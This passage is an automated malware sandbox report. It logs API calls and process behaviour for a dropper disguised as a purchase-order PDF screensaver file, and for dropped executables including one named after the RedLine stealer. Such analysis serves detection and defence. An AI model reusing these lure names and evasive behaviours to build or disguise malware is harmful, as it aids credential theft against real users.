                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_004772DE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 3_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_004375B0
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\build.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
